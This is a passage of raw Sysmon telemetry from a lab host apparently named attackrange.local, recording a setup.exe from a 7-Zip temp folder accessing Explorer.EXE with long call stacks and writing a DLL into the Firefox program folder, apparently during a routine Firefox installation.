13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-private-l1-1-0.dll2021-01-18 13:59:52.208 10341000x800000000000000014459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10